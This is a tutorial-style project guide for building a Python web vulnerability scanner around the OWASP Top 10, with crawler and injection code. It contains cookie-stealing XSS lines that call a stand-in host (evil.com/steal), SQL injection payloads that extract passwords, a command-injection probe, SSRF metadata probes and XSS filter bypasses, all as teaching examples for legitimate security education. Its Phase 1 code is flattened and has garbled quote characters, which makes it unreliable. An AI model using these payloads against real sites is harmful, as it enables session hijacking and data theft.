Project 2: Web Application Vulnerability Scanner

Project Overview

Attribute             Value
Difficulty            Intermediate
Time Estimate         2-3 weeks
Programming Language  Python
Primary Framework     OWASP Top 10
Main Book             “Bug Bounty Bootcamp” by Vickie Li
Knowledge Area        Web Security

Learning Objectives

By completing this project, you will:

  1. Master the OWASP Top 10 - Understand each vulnerability class deeply enough to detect and exploit them
  2. Understand HTTP at the protocol level - Request/response headers, cookies, sessions, and state management
  3. Build automated security testing - Design scanners that find real vulnerabilities
  4. Learn attack surface discovery - Crawl applications to identify all input points
  5. Develop responsible disclosure skills - Report findings professionally with evidence

The Core Question

“How do web application scanners automatically find vulnerabilities that developers miss?”

Web applications are among the most exposed attack surfaces in modern organizations. Building your own scanner teaches you:

  • Why certain coding patterns create vulnerabilities
  • How injection attacks actually work at the request/response level
  • What distinguishes false positives from true positives
  • The difference between automated scanning and skilled manual testing

Deep Theoretical Foundation

The HTTP Protocol: Your Attack Surface

Exploiting any web vulnerability comes down to sending HTTP requests and reading HTTP responses, so you must understand this protocol intimately:

HTTP REQUEST ANATOMY
════════════════════

POST /login HTTP/1.1                           ◄── Request Line
Host: vulnerable-app.com                       ◄── Headers begin
User-Agent: Mozilla/5.0 (Windows NT 10.0)
Accept: text/html,application/xhtml+xml
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
Cookie: session=abc123; tracking=xyz789        ◄── Cookies (session state)
Connection: close
                                               ◄── Blank line separates headers/body
username=admin&password=secret123              ◄── Request Body (POST data)


HTTP RESPONSE ANATOMY
═════════════════════

HTTP/1.1 200 OK                                ◄── Status Line
Date: Sat, 27 Dec 2025 12:00:00 GMT
Server: Apache/2.4.41 (Ubuntu)                 ◄── Information disclosure!
X-Powered-By: PHP/7.4.3                        ◄── More info disclosure!
Set-Cookie: session=def456; HttpOnly; Secure   ◄── New session cookie
Content-Type: text/html; charset=UTF-8
Content-Length: 1234
                                               ◄── Blank line
<!DOCTYPE html>                                ◄── Response Body
<html>
<head><title>Welcome Admin</title></head>      ◄── May reveal successful login
<body>...
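
To make the anatomy concrete, here is a minimal sketch that splits a raw HTTP/1.1 request into its request line, headers, and body. The names `ParsedRequest` and `parse_raw_request` are illustrative and not part of the project skeleton; in the scanner itself you would normally let `requests` build and parse messages for you.

```python
from dataclasses import dataclass
from typing import Dict


@dataclass
class ParsedRequest:
    method: str
    path: str
    version: str
    headers: Dict[str, str]
    body: str


def parse_raw_request(raw: str) -> ParsedRequest:
    """Split a raw HTTP/1.1 request into request line, headers, and body."""
    # The first blank line (CRLF CRLF) separates the header section from the body.
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        # Header names are case-insensitive, so normalise them to lower case.
        headers[name.strip().lower()] = value.strip()
    return ParsedRequest(method, path, version, headers, body)


raw = (
    "POST /login HTTP/1.1\r\n"
    "Host: vulnerable-app.com\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 33\r\n"
    "Cookie: session=abc123; tracking=xyz789\r\n"
    "\r\n"
    "username=admin&password=secret123"
)
req = parse_raw_request(raw)
print(req.method, req.path, req.headers["content-length"], len(req.body))
```

Note that the `Content-Length` value has to equal the byte length of the body; a scanner that rewrites the body with a payload must let its HTTP library recompute it.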

Where Vulnerabilities Live

Web applications have multiple layers, each with unique attack surfaces:

┌─────────────────────────────────────────────────────────────────────┐
│                        WEB APPLICATION STACK                        │
│                   (Attack Surface at Every Layer)                   │
└─────────────────────────────────────────────────────────────────────┘

CLIENT SIDE (Browser)
┌─────────────────────────────────────────────────────────────────────┐
│                                                                     │
│  ┌─────────────────┐  ┌─────────────────┐  ┌─────────────────┐      │
│  │   JavaScript    │  │  Local Storage  │  │    Cookies      │      │
│  │                 │  │                 │  │                 │      │
│  │ ● XSS attacks   │  │ ● Sensitive     │  │ ● Session       │      │
│  │   execute here  │  │   data exposure │  │   hijacking     │      │
│  │ ● DOM           │  │ ● No HttpOnly   │  │ ● CSRF tokens   │      │
│  │   manipulation  │  │   protection    │  │ ● Missing       │      │
│  │                 │  │                 │  │   Secure flag   │      │
│  └─────────────────┘  └─────────────────┘  └─────────────────┘      │
│                                                                     │
└─────────────────────────────────────────────────────────────────────┘
                                   │
                                   │  HTTP Request
                                   ▼
┌─────────────────────────────────────────────────────────────────────┐
│  WEB SERVER (nginx, Apache, IIS)                                    │
│                                                                     │
│  ● Security headers (CSP, X-Frame-Options)                          │
│  ● TLS configuration (HTTPS)                                        │
│  ● Directory listings                                               │
│  ● Server version disclosure                                        │
│                                                                     │
└─────────────────────────────────────────────────────────────────────┘
                                   │
                                   ▼
┌─────────────────────────────────────────────────────────────────────┐
│  APPLICATION LAYER (PHP, Python, Node.js, Java)                     │
│                                                                     │
│  ┌──────────────────────────────────────────────────────────────┐   │
│  │                        INPUT HANDLING                        │   │
│  │                                                              │   │
│  │  URL Parameters:  /page?id=1        ← SQL Injection          │   │
│  │  POST Data:       username=admin    ← Auth Bypass            │   │
│  │  Headers:         User-Agent: ...   ← Log Injection          │   │
│  │  Cookies:         role=user         ← Privilege Escalation   │   │
│  │  File Uploads:    image.php.jpg     ← Remote Code Execution  │   │
│  │  JSON/XML:        {"user":"..."}    ← XXE, Deserialization   │   │
│  └──────────────────────────────────────────────────────────────┘   │
│                                                                     │
│  ┌──────────────────────────────────────────────────────────────┐   │
│  │                        BUSINESS LOGIC                        │   │
│  │                                                              │   │
│  │  ● IDOR (Insecure Direct Object Reference)                   │   │
│  │    GET /api/users/123 → Change to /api/users/124             │   │
│  │                                                              │   │
│  │  ● Authorization flaws                                       │   │
│  │    User can access admin functions                           │   │
│  │                                                              │   │
│  │  ● Race conditions                                           │   │
│  │    Submit payment twice quickly                              │   │
│  └──────────────────────────────────────────────────────────────┘   │
│                                                                     │
└─────────────────────────────────────────────────────────────────────┘
                                   │
                                   ▼
┌─────────────────────────────────────────────────────────────────────┐
│  DATABASE LAYER                                                     │
│                                                                     │
│  ● SQL Injection (SELECT * FROM users WHERE id='$input')            │
│  ● NoSQL Injection (MongoDB query operators)                        │
│  ● Stored XSS (malicious data in database)                          │
│  ● Credential exposure (passwords in plaintext)                     │
│                                                                     │
└─────────────────────────────────────────────────────────────────────┘

Web Application Stack - Attack Surface at Every Layer

OWASP Top 10 2021: What Your Scanner Must Find

┌─────────────────────────────────────────────────────────────────────┐
│               OWASP TOP 10 2021 VULNERABILITY CLASSES               │
└─────────────────────────────────────────────────────────────────────┘

[A01] BROKEN ACCESS CONTROL
───────────────────────────
What: Users can access resources they shouldn't
How to test:
  1. Change ?user_id=123 to ?user_id=124
  2. Access /admin without admin role
  3. Modify hidden form fields (role=admin)
  4. Bypass authentication via direct URL

Scanner Detection:
  ├── Test IDOR by incrementing/decrementing IDs
  ├── Access restricted paths without authentication
  └── Modify request parameters and observe response changes


[A02] CRYPTOGRAPHIC FAILURES
────────────────────────────
What: Sensitive data exposed due to weak/missing encryption
How to test:
  1. Check for HTTP (not HTTPS)
  2. Analyze password storage (MD5, plaintext visible)
  3. Look for sensitive data in responses

Scanner Detection:
  ├── Flag any non-HTTPS login pages
  ├── Check for password/credit card in response bodies
  └── Analyze Set-Cookie for missing Secure flag


[A03] INJECTION (SQL, Command, LDAP)
────────────────────────────────────
What: Untrusted data sent to interpreter as part of command
How to test:
  1. Add ' to inputs, look for SQL errors
  2. Try SQL payloads: ' OR '1'='1
  3. Test for command injection: ; ls -la
  4. LDAP injection: )(uid=*)

Scanner Detection:
  ├── Inject ' and " in all parameters
  ├── Analyze error messages for SQL syntax errors
  ├── Use time-based payloads: ' AND SLEEP(5)--
  └── Look for command output in responses


[A04] INSECURE DESIGN
─────────────────────
What: Missing security controls, flawed architecture
How to test:
  1. Check for rate limiting (brute force possible?)
  2. Review password reset flow
  3. Look for missing CAPTCHA

Scanner Detection:
  ├── Send 100 requests rapidly, check for rate limiting
  ├── Test password reset token predictability
  └── Note: Many design flaws need manual review


[A05] SECURITY MISCONFIGURATION
───────────────────────────────
What: Insecure default configs, unnecessary features
How to test:
  1. Check for default credentials
  2. Look for exposed admin interfaces
  3. Directory listing enabled?
  4. Stack traces in errors?

Scanner Detection:
  ├── Access /admin, /phpmyadmin, /wp-admin
  ├── Trigger errors, check for verbose messages
  ├── Test for directory listing: /images/
  └── Check common default credentials


[A06] VULNERABLE COMPONENTS
───────────────────────────
What: Using libraries with known CVEs
How to test:
  1. Identify framework/library versions
  2. Check against CVE databases
  3. Look for outdated JavaScript libraries

Scanner Detection:
  ├── Parse Server header for versions
  ├── Check JavaScript libraries against retire.js
  └── Identify framework from response patterns


[A07] AUTHENTICATION FAILURES
─────────────────────────────
What: Broken login, session management
How to test:
  1. Brute force with common passwords
  2. Session fixation attacks
  3. Session timeout (do sessions expire?)

Scanner Detection:
  ├── Try admin:admin, admin:password
  ├── Check if session ID changes after login
  ├── Look for session ID in URL (bad practice)
  └── Test remember-me token security


[A08] DATA INTEGRITY FAILURES
─────────────────────────────
What: Software updates without verification
How to test:
  1. Check for unsigned updates
  2. Look for insecure deserialization

Scanner Detection:
  ├── Limited automated testing
  └── Flag if application loads external resources


[A09] LOGGING/MONITORING FAILURES
─────────────────────────────────
What: Attacks go undetected
How to test:
  1. Trigger suspicious activity
  2. Check if you're blocked after failed logins

Scanner Detection:
  ├── Multiple failed logins - are you blocked?
  └── Note: Primarily manual review


[A10] SSRF (Server-Side Request Forgery)
────────────────────────────────────────
What: Server makes requests to attacker-controlled destinations
How to test:
  1. Find URL input parameters
  2. Try ?url=http://169.254.169.254 (AWS metadata)
  3. Try ?url=http://localhost:8080

Scanner Detection:
  ├── Inject URLs pointing to known callback server
  ├── Try cloud metadata URLs
  └── Test for internal port scanning via SSRF
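
As one small example of turning a checklist item into code, the A02 check "Analyze Set-Cookie for missing Secure flag" can be sketched as below. The function name `missing_cookie_flags` is hypothetical, and the parsing is deliberately simple: it assumes a single well-formed `Set-Cookie` header value and looks only for the `Secure` and `HttpOnly` attributes.

```python
from typing import List


def missing_cookie_flags(set_cookie: str) -> List[str]:
    """Return the security attributes absent from one Set-Cookie header value."""
    # Attributes follow the first name=value pair, separated by semicolons.
    attributes = {
        part.strip().split("=", 1)[0].lower()
        for part in set_cookie.split(";")[1:]
    }
    expected = ["secure", "httponly"]
    return [flag for flag in expected if flag not in attributes]


print(missing_cookie_flags("session=def456; HttpOnly; Secure"))
print(missing_cookie_flags("session=abc123; Path=/"))
```

An empty list means both attributes were present; anything else is a candidate low-severity finding for the report.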

SQL Injection Deep Dive

SQL injection remains prevalent because the mistake is easy to make and can be hard to detect automatically:

NORMAL LOGIN QUERY
══════════════════

User Input:
  username: alice
  password: secret123

Application Code (VULNERABLE):
  query = "SELECT * FROM users WHERE username='" + username +
          "' AND password='" + password + "'"

Resulting Query:
  SELECT * FROM users WHERE username='alice' AND password='secret123'

Result: Only returns Alice's record if password matches


SQL INJECTION ATTACK
════════════════════

User Input:
  username: admin' --
  password: anything

Resulting Query:
  SELECT * FROM users WHERE username='admin' --' AND password='anything'
                                             ↑
                                    This is a SQL comment!
                                    Everything after is ignored

Actual Query Executed:
  SELECT * FROM users WHERE username='admin'

Result: Returns admin account WITHOUT password check!
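
The bypass can be reproduced locally without attacking anything. The sketch below uses Python's built-in `sqlite3` module with an in-memory database; the table contents and the function names `login_vulnerable` and `login_safe` are made up for illustration, and passwords are stored in plaintext only to keep the demo short.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")
conn.execute("INSERT INTO users VALUES ('alice', 'secret123')")


def login_vulnerable(username: str, password: str):
    # String concatenation: user input becomes part of the SQL text.
    query = ("SELECT username FROM users WHERE username='" + username +
             "' AND password='" + password + "'")
    return conn.execute(query).fetchall()


def login_safe(username: str, password: str):
    # Placeholders: the driver passes input as data, never as SQL syntax.
    query = "SELECT username FROM users WHERE username=? AND password=?"
    return conn.execute(query, (username, password)).fetchall()


print(login_vulnerable("admin' --", "anything"))  # admin row comes back
print(login_safe("admin' --", "anything"))        # no rows
```

The only difference between the two functions is how the input reaches the database, which is why parameterized queries are the standard recommendation your scanner's report should give for SQLi findings.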


UNION-BASED DATA EXTRACTION
═══════════════════════════

URL: /products?id=5

Normal Query:
  SELECT name, price, description FROM products WHERE id=5

Attack URL: /products?id=5 UNION SELECT username,password,email FROM users--

Resulting Query:
  SELECT name, price, description FROM products WHERE id=5
  UNION
  SELECT username, password, email FROM users--

Result: Page displays ALL usernames, passwords, and emails!


TIME-BASED BLIND SQL INJECTION
══════════════════════════════

When no visible output exists, measure response time:

Attack: /products?id=5' AND SLEEP(5)--

If the page takes 5+ seconds to load:
  → SQL injection is likely (repeat the request to rule out network latency)
  → The database is executing the SLEEP() call

Extracting data character by character:
  /products?id=5' AND IF(SUBSTRING(database(),1,1)='a',SLEEP(5),0)--

  If response takes 5 seconds → First char of database name is 'a'
  If response is instant → First char is NOT 'a', try 'b', 'c', etc.
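
Deciding whether a response was "slow enough" is where time-based scanners produce most of their false positives. A minimal sketch of that decision, assuming you have already measured a few baseline response times for the unmodified request, might look like this; the function name `looks_time_based` and the `tolerance` parameter are illustrative choices, not a standard.

```python
import statistics
from typing import Sequence


def looks_time_based(baseline: Sequence[float], injected: float,
                     sleep_seconds: float = 5.0, tolerance: float = 0.8) -> bool:
    """Decide whether an injected request was delayed by roughly sleep_seconds."""
    # Use the median so one slow baseline request does not skew the comparison.
    typical = statistics.median(baseline)
    # Require most of the requested sleep on top of the normal response time.
    return injected - typical >= sleep_seconds * tolerance


baseline_times = [0.21, 0.19, 0.25, 0.22]
print(looks_time_based(baseline_times, 5.3))  # delayed by about 5 seconds
print(looks_time_based(baseline_times, 0.9))  # ordinary jitter
```

Re-sending the payload with a different sleep value and checking that the delay scales with it is a common way to raise confidence further.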

Cross-Site Scripting (XSS) Explained

XSS ATTACK TYPES
════════════════

REFLECTED XSS (Non-Persistent)
──────────────────────────────
Attack URL sent to victim via phishing:
  https://vulnerable.com/search?q=<script>document.location='https://evil.com/steal?c='+document.cookie</script>

Server reflects input in response:
  <h1>Search results for: <script>document.location='...'</script></h1>

Browser executes the script → Cookies stolen!


STORED XSS (Persistent)
───────────────────────
Attacker posts comment:
  Great product! <script>document.location='https://evil.com/steal?c='+document.cookie</script>

Comment saved in database, displayed to ALL users who view page
Every visitor's cookies are stolen automatically


DOM-BASED XSS
─────────────
Vulnerable JavaScript:
  document.getElementById('output').innerHTML = location.hash.substring(1);

Attack URL:
  https://vulnerable.com/page#<img src=x onerror=alert(document.cookie)>

Script never goes to server - executes entirely client-side


XSS PAYLOADS FOR TESTING
════════════════════════

Basic:
  <script>alert('XSS')</script>

Event handlers:
  <img src=x onerror=alert('XSS')>
  <body onload=alert('XSS')>
  <svg onload=alert('XSS')>

Filter bypasses:
  <ScRiPt>alert('XSS')</ScRiPt>                    # Case variation
  <script>alert(String.fromCharCode(88,83,83))</script>  # Char codes
  <img src=x onerror="&#97;lert('XSS')">           # HTML entities
  <script>eval(atob('YWxlcnQoJ1hTUycp'))</script>  # Base64

Context-aware:
  In attribute: " onmouseover="alert('XSS')
  In JavaScript: ';alert('XSS');//
  In URL: javascript:alert('XSS')
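
Before firing real payloads, a scanner can send a harmless probe and see how the application echoes it. The sketch below is one way to classify the result; `make_probe` and `classify_reflection` are hypothetical helper names, and the approach assumes the application uses standard HTML entity encoding when it encodes at all.

```python
import html
import secrets


def make_probe() -> str:
    """Build a harmless probe containing characters that HTML encoding changes."""
    marker = secrets.token_hex(4)
    return f"<xss{marker}>\"'"


def classify_reflection(probe: str, body: str) -> str:
    """Classify how a probe string came back in a response body."""
    if probe in body:
        return "reflected-unencoded"   # candidate XSS, needs context analysis
    if html.escape(probe, quote=True) in body:
        return "reflected-encoded"     # output encoding appears to be applied
    return "not-reflected"


probe = make_probe()
raw_page = f"<h1>Search results for: {probe}</h1>"
safe_page = f"<h1>Search results for: {html.escape(probe)}</h1>"
print(classify_reflection(probe, raw_page))
print(classify_reflection(probe, safe_page))
```

A random marker makes the probe unique per request, so a match in the response cannot be confused with text that was already on the page.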

Project Specification

What You're Building

A modular web vulnerability scanner with the following structure:

web-vuln-scanner/
├── scanner.py              # Main scanner orchestrator
├── crawler.py              # Web crawler for attack surface discovery
├── modules/
│   ├── __init__.py
│   ├── sqli.py             # SQL injection tests
│   ├── xss.py              # XSS tests
│   ├── idor.py             # IDOR/access control tests
│   ├── ssrf.py             # SSRF tests
│   ├── headers.py          # Security headers analysis
│   └── disclosure.py       # Information disclosure tests
├── payloads/
│   ├── sqli.txt            # SQL injection payloads
│   ├── xss.txt             # XSS payloads
│   └── wordlists/          # Directory brute-force lists
├── reports/
│   └── templates/
│       └── report.html     # HTML report template
├── requirements.txt
└── README.md

Functional Requirements

1. Web Crawler (crawler.py)

Must implement:

  • Start from seed URL, discover all pages
  • Extract forms (action URL, method, input fields)
  • Extract links (href, src)
  • Respect robots.txt (optional override)
  • Handle relative and absolute URLs
  • Track visited URLs to avoid loops

Should implement:

  • JavaScript rendering (Selenium/Playwright)
  • API endpoint discovery
  • Handle authentication (cookie jar)
  • Rate limiting

Output: List of pages with their forms and parameters
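
For the robots.txt requirement, the standard library already ships a parser. The following sketch wraps `urllib.robotparser.RobotFileParser` so the crawler can ask whether a URL is allowed; the helper name `build_robots_checker` and the user-agent string `web-vuln-scanner` are assumptions made for this example, and the robots.txt text is passed in directly so the snippet runs offline.

```python
from urllib.robotparser import RobotFileParser


def build_robots_checker(robots_txt: str, user_agent: str = "web-vuln-scanner"):
    """Return a function that says whether a URL may be crawled."""
    parser = RobotFileParser()
    # parse() accepts the file content as an iterable of lines.
    parser.parse(robots_txt.splitlines())
    return lambda url: parser.can_fetch(user_agent, url)


robots_txt = """\
User-agent: *
Disallow: /admin/
"""
allowed = build_robots_checker(robots_txt)
print(allowed("https://target.com/products"))
print(allowed("https://target.com/admin/users"))
```

The "optional override" from the requirements can then be a simple flag that skips this check, which is useful on test targets you own where the disallowed paths are exactly the ones worth scanning.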

2. SQL Injection Scanner (modules/sqli.py)

Must implement:

  • Error-based detection (look for SQL errors in response)
  • Boolean-based detection (compare true/false responses)
  • Time-based detection (measure response delays)
  • Test all parameter types (GET, POST, cookies)

Should implement:

  • UNION-based exploitation
  • Identify database type (MySQL, PostgreSQL, MSSQL)
  • Extract table names
  • Payload encoding for WAF bypass
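
Boolean-based detection boils down to comparing three response bodies: the original page, the page with an always-true condition appended (for example `' AND '1'='1`), and the page with an always-false condition (for example `' AND '1'='2`). A minimal sketch of that comparison, using `difflib` from the standard library and an arbitrary similarity threshold of 0.95, could look like this; the function names are illustrative.

```python
from difflib import SequenceMatcher


def similarity(a: str, b: str) -> float:
    """Return a 0..1 similarity score between two response bodies."""
    return SequenceMatcher(None, a, b).ratio()


def boolean_based_suspect(original: str, true_body: str, false_body: str,
                          threshold: float = 0.95) -> bool:
    """Flag a parameter when TRUE matches the original but FALSE does not."""
    true_matches = similarity(original, true_body) >= threshold
    false_differs = similarity(original, false_body) < threshold
    return true_matches and false_differs


page = "<ul><li>Widget</li><li>Gadget</li></ul>"
empty = "<p>No products found</p>"
print(boolean_based_suspect(page, page, empty))  # behaves like injected SQL
print(boolean_based_suspect(page, page, page))   # payload had no effect
```

Pages with dynamic content (timestamps, CSRF tokens, ads) lower the similarity score on their own, so the threshold usually needs tuning per target.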

3. XSS Scanner (modules/xss.py)

Must implement:

  • Reflected XSS detection
  • Multiple context detection (HTML, attribute, JavaScript)
  • Basic filter bypass payloads

Should implement:

  • Stored XSS detection (check if payload persists)
  • DOM-based XSS detection
  • Custom payload generation based on context

4. IDOR Scanner (modules/idor.py)

Must implement:

  • Detect numeric ID parameters
  • Test ID manipulation (increment/decrement)
  • Compare responses for different IDs

Should implement:

  • UUID/GUID manipulation
  • Test with different user sessions

5. Security Headers Analyzer (modules/headers.py)

Must check for:

  • Content-Security-Policy
  • X-Content-Type-Options
  • X-Frame-Options
  • Strict-Transport-Security
  • X-XSS-Protection (legacy header, deprecated in modern browsers; report its value but treat CSP as the real control)
  • Server/X-Powered-By disclosure
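
A header analyzer is mostly a dictionary lookup. The sketch below takes response headers as a plain `dict` (which is what `requests` exposes via `response.headers`) and reports which of the headers listed above are missing and which disclosure headers are present. The constant and function names are illustrative.

```python
from typing import Dict, List

CHECKED_HEADERS = [
    "Content-Security-Policy",
    "X-Content-Type-Options",
    "X-Frame-Options",
    "Strict-Transport-Security",
    "X-XSS-Protection",
]
DISCLOSURE_HEADERS = ["Server", "X-Powered-By"]


def analyze_headers(headers: Dict[str, str]) -> Dict[str, List[str]]:
    """Report missing security headers and present disclosure headers."""
    # HTTP header names are case-insensitive, so compare in lower case.
    present = {name.lower(): value for name, value in headers.items()}
    missing = [h for h in CHECKED_HEADERS if h.lower() not in present]
    disclosed = [f"{h}: {present[h.lower()]}" for h in DISCLOSURE_HEADERS
                 if h.lower() in present]
    return {"missing": missing, "disclosed": disclosed}


sample = {
    "Server": "Apache/2.4.41 (Ubuntu)",
    "X-Powered-By": "PHP/7.4.3",
    "Content-Type": "text/html; charset=UTF-8",
    "x-frame-options": "DENY",
}
print(analyze_headers(sample))
```

Presence alone is a weak signal; a fuller module would also inspect values, for example a `Content-Security-Policy` that allows `unsafe-inline`.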

6. Report Generator

Must implement:

  • JSON output for tool integration
  • HTML report with findings, evidence, recommendations
  • Severity ratings (Critical, High, Medium, Low)
  • Screenshots/evidence storage
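
For the JSON output, one possible shape is a summary of counts per severity followed by the findings sorted from most to least severe. The sketch below works on plain dictionaries to stay self-contained; the field names `target`, `summary`, and `findings` are assumptions, not a format the project prescribes.

```python
import json
from typing import Dict, List

SEVERITY_ORDER = {"critical": 0, "high": 1, "medium": 2, "low": 3}


def build_json_report(target: str, findings: List[Dict[str, str]]) -> str:
    """Serialize findings to JSON, most severe first, with per-severity counts."""
    ordered = sorted(findings, key=lambda f: SEVERITY_ORDER[f["severity"]])
    summary = {level: 0 for level in SEVERITY_ORDER}
    for finding in ordered:
        summary[finding["severity"]] += 1
    report = {"target": target, "summary": summary, "findings": ordered}
    return json.dumps(report, indent=2)


findings = [
    {"severity": "low", "title": "Missing X-Frame-Options"},
    {"severity": "critical", "title": "SQL injection in id"},
    {"severity": "high", "title": "Reflected XSS in q"},
]
print(build_json_report("https://target.com", findings))
```

The same ordered structure can be handed to an HTML template, so both output formats stay consistent.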

Solution Architecture

Component Design

┌─────────────────────────────────────────────────────────────────────┐
│                      WEB VULNERABILITY SCANNER                      │
└─────────────────────────────────────────────────────────────────────┘
                              │
                              ▼
                    ┌───────────────────┐
                    │   Orchestrator    │
                    │   (scanner.py)    │
                    ├───────────────────┤
                    │ - Load config     │
                    │ - Initialize      │
                    │ - Coordinate      │
                    │ - Generate report │
                    └─────────┬─────────┘
                              │
        ┌─────────────────────┼─────────────────────┐
        │                     │                     │
        ▼                     ▼                     ▼
┌───────────────┐    ┌───────────────┐    ┌───────────────┐
│   Crawler     │    │   Modules     │    │   Reporter    │
├───────────────┤    ├───────────────┤    ├───────────────┤
│ - Discover    │    │ - SQLi        │    │ - Format      │
│   pages       │───►│ - XSS         │───►│   findings    │
│ - Extract     │    │ - IDOR        │    │ - Generate    │
│   forms       │    │ - Headers     │    │   HTML/JSON   │
│ - Map attack  │    │ - SSRF        │    │ - Severity    │
│   surface     │    │               │    │   rating      │
└───────────────┘    └───────────────┘    └───────────────┘

Key Data Structures

from dataclasses import dataclass
from typing import List, Optional

# Classes are ordered so that every type is defined before it is referenced.

@dataclass
class Parameter:
    name: str
    value: str
    location: str  # query, body, cookie, header
    param_type: str  # string, numeric, email, etc.

@dataclass
class FormInput:
    name: str
    input_type: str  # text, password, hidden, etc.
    value: Optional[str]

@dataclass
class Form:
    action: str
    method: str
    inputs: List[FormInput]

@dataclass
class CrawlResult:
    url: str
    method: str  # GET, POST
    parameters: List[Parameter]
    forms: List[Form]
    response_code: int

@dataclass
class Vulnerability:
    vuln_type: str  # sqli, xss, idor, etc.
    severity: str  # critical, high, medium, low
    url: str
    parameter: str
    payload: str
    evidence: str
    reproduction_steps: List[str]
    recommendation: str

Testing Flow

SCANNER WORKFLOW
════════════════

1. CRAWLING PHASE
   ┌─────────────────────────────────────────────────────────────┐
   │  Start URL: https://target.com                              │
   │                                                             │
   │  → Visit page                                               │
   │  → Extract links: /login, /products, /about                 │
   │  → Extract forms: login form, search form                   │
   │  → Queue new URLs for crawling                              │
   │  → Repeat until all URLs visited                            │
   │                                                             │
   │  Result: Attack surface map                                 │
   │    - 50 unique pages                                        │
   │    - 12 forms                                               │
   │    - 85 parameters                                          │
   └─────────────────────────────────────────────────────────────┘

2. TESTING PHASE
   ┌─────────────────────────────────────────────────────────────┐
   │  For each parameter in attack surface:                      │
   │                                                             │
   │  SQLi Module:                                               │
   │    - Inject ' and " → Check for SQL errors                  │
   │    - Try boolean payloads → Compare responses               │
   │    - Try time-based → Measure delays                        │
   │                                                             │
   │  XSS Module:                                                │
   │    - Inject <script>alert(1)</script>                       │
   │    - Check if payload appears in response                   │
   │    - Test multiple contexts                                 │
   │                                                             │
   │  IDOR Module:                                               │
   │    - If numeric ID found, try adjacent values               │
   │    - Compare response content                               │
   │                                                             │
   │  ...repeat for each module...                               │
   └─────────────────────────────────────────────────────────────┘

3. REPORTING PHASE
   ┌─────────────────────────────────────────────────────────────┐
   │  Aggregate all findings:                                    │
   │    - Critical: 2 SQLi vulnerabilities                       │
   │    - High: 5 XSS vulnerabilities                            │
   │    - Medium: 3 IDOR issues                                  │
   │    - Low: 8 missing security headers                        │
   │                                                             │
   │  Generate report with:                                      │
   │    - Executive summary                                      │
   │    - Technical details for each finding                     │
   │    - Reproduction steps                                     │
   │    - Recommendations                                        │
   └─────────────────────────────────────────────────────────────┘

Web Vulnerability Scanner Workflow - Three Phase Process


Phased Implementation Guide

Phase 1: HTTP Client and Crawler Foundation (Days 1-3)

Goal: Crawl a simple website and extract all forms

Implementation steps:

  1. Create HTTP session wrapper: ```python import requests from urllib.parse import urljoin, urlparse

class WebSession: def init(self, base_url: str, timeout: int = 10): self.session = requests.Session() self.base_url = base_url self.timeout = timeout self.visited = set()

def get(self, url: str) -> requests.Response:
    full_url = urljoin(self.base_url, url)
    return self.session.get(full_url, timeout=self.timeout)

def post(self, url: str, data: dict) -> requests.Response:
    full_url = urljoin(self.base_url, url)
    return self.session.post(full_url, data=data, timeout=self.timeout) ```
  1. Implement HTML parser for links and forms: ```python from bs4 import BeautifulSoup

def extract_links(html: str, base_url: str) -> List[str]: soup = BeautifulSoup(html, โ€˜html.parserโ€™) links = [] for a in soup.find_all(โ€˜aโ€™, href=True): link = urljoin(base_url, a[โ€˜hrefโ€™]) if urlparse(link).netloc == urlparse(base_url).netloc: links.append(link) return links

def extract_forms(html: str, base_url: str) -> List[Form]: soup = BeautifulSoup(html, โ€˜html.parserโ€™) forms = [] for form in soup.find_all(โ€˜formโ€™): action = urljoin(base_url, form.get(โ€˜actionโ€™, โ€˜โ€™)) method = form.get(โ€˜methodโ€™, โ€˜getโ€™).upper() inputs = [] for inp in form.find_all([โ€˜inputโ€™, โ€˜textareaโ€™, โ€˜selectโ€™]): inputs.append(FormInput( name=inp.get(โ€˜nameโ€™, โ€˜โ€™), input_type=inp.get(โ€˜typeโ€™, โ€˜textโ€™), value=inp.get(โ€˜valueโ€™, โ€˜โ€™) )) forms.append(Form(action, method, inputs)) return forms


  3. Implement BFS crawler:

```python
from collections import deque
from typing import List

def crawl(start_url: str, max_pages: int = 100) -> List[CrawlResult]:
    session = WebSession(start_url)
    queue = deque([start_url])
    results = []

    while queue and len(results) < max_pages:
        url = queue.popleft()
        if url in session.visited:
            continue
        session.visited.add(url)

        try:
            response = session.get(url)
            links = extract_links(response.text, url)
            forms = extract_forms(response.text, url)
            params = extract_url_params(url)

            results.append(CrawlResult(url, 'GET', params, forms, response.status_code))

            for link in links:
                if link not in session.visited:
                    queue.append(link)
        except Exception as e:
            print(f"Error crawling {url}: {e}")

    return results
```

Verification: Crawl DVWA or OWASP WebGoat and list all discovered forms
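
The crawler above calls `extract_url_params`, which this section does not define. A minimal sketch follows, assuming each parameter is stored in a small `Parameter` record. That type is hypothetical and is shaped only to match how Phase 5 reads `param.name` and `param.value`.

```python
from dataclasses import dataclass
from typing import List
from urllib.parse import parse_qsl, urlparse


@dataclass(frozen=True)
class Parameter:
    """Hypothetical record for one query-string parameter."""
    name: str
    value: str


def extract_url_params(url: str) -> List[Parameter]:
    """Return every query-string parameter in the URL, in order of appearance."""
    query = urlparse(url).query
    # keep_blank_values=True keeps parameters such as "?sort=" that parse_qsl drops by default
    return [Parameter(name, value)
            for name, value in parse_qsl(query, keep_blank_values=True)]


params = extract_url_params("http://localhost/item.php?id=42&sort=")
print([(p.name, p.value) for p in params])
```

Empty parameters are kept on purpose: a blank value is still an input point that the injection modules should test.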

Phase 2: SQL Injection Module (Days 3-6)

Goal: Detect SQL injection in any parameter

Implementation steps:

  1. Create payload injection framework:
    from urllib.parse import parse_qs, urlencode, urlparse

    def inject_parameter(session: WebSession, url: str, param: str, payload: str, method: str = 'GET') -> requests.Response:
        """Inject payload into specific parameter"""
        if method == 'GET':
            # Replace (or add) the parameter in the URL query string
            parsed = urlparse(url)
            params = parse_qs(parsed.query, keep_blank_values=True)
            params[param] = [payload]
            # doseq=True expands the list values that parse_qs produces
            new_query = urlencode(params, doseq=True)
            new_url = parsed._replace(query=new_query).geturl()
            return session.get(new_url)
        else:
            # Send the payload in the POST body
            return session.post(url, data={param: payload})
    
  2. Implement error-based detection:

```python
from typing import Optional

